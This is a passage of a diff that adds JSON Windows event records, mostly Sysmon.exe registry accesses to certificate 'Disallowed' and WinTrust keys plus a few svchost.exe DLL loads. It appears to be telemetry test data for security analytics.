"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dsrole.dll", + "image_path": "C:\\Windows\\System32\\dsrole.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "pcwum.dll", + "image_path": "C:\\Windows\\System32\\pcwum.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mi.dll", + "image_path": "C:\\Windows\\System32\\mi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 